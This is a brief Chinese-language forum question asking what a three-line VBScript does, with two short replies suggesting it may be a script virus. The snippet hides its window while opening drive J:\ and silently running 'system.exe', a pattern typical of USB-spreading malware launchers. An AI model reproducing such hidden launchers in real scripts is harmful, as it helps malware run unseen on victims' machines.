set yu=wscript.createobject("wscript.shell")
yu.run "cmd /c start J:\",0
yu.run "cmd /c start system.exe",0
这个代码是什么意思?
set yu=wscript.createobject("wscript.shell")
yu.run "cmd /c start J:\",0
yu.run "cmd /c start system.exe",0
这个代码是什么意思?
vbs代码
可能是VBS脚本病毒